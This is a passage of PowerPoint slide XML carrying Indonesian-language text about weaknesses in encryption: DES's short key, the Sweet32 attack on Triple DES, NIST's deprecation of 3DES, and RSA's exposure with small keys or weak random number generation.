            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>simetris</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>asimetris</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rangkaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyebabkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>potensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Salah </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang paling </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>signifikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>algoritma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>enkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>simetris</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penggunaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lemah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Algoritma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Data Encryption Standard (DES), yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dulunya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merupakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>standar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>enkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>simetris</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>populer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ternyata</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rentan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> brute force </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ukuran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kuncinya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebesar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> 56-bit. DES, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikembangkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>awal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tahun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> 1970-an, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pertama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>didemonstrasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>publik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rentan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> brute force di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akhir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tahun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> 1990-an. Hal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyebabkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penggantinya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>standar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Triple DES dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akhirnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Advanced Encryption Standard (AES). Triple DES (3DES), yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menerapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>algoritma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> DES </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tiga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melindungi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dianggap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jauh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daripada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> DES </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>itu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>awalnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diperkenalkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Namun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berkembangnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komputasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditemukannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>metode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tambahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> 3DES </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>telah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditemukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terutama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ulang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tahun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> "Sweet32" (CVE-2016-2183) yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dipublikasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bulan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Agustus 2016. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Institut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Standar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Teknologi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Nasional AS (NIST) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>resmi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lagi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> 3DES pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tahun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> 2017 dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merekomendasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penghentiannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tahun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> 2023.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>algoritma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>enkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>asimetris</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, RSA, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kriptosistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>publik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>luas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rentan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ukuran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kecil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pembangkitan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>angka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>acak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lemah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Selain </a:t>
